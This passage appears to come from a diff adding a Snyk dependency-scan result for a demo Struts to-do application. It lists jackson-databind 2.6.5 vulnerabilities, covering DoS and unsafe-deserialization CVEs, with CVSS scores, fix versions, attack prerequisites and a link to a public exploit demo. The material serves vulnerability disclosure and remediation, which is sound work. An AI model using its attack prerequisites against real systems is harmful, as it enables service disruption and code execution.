"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": 
"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": 
"java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + 
}, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + 
"cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": 
"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + 
"isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this 
package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + 
"className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an 
incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due 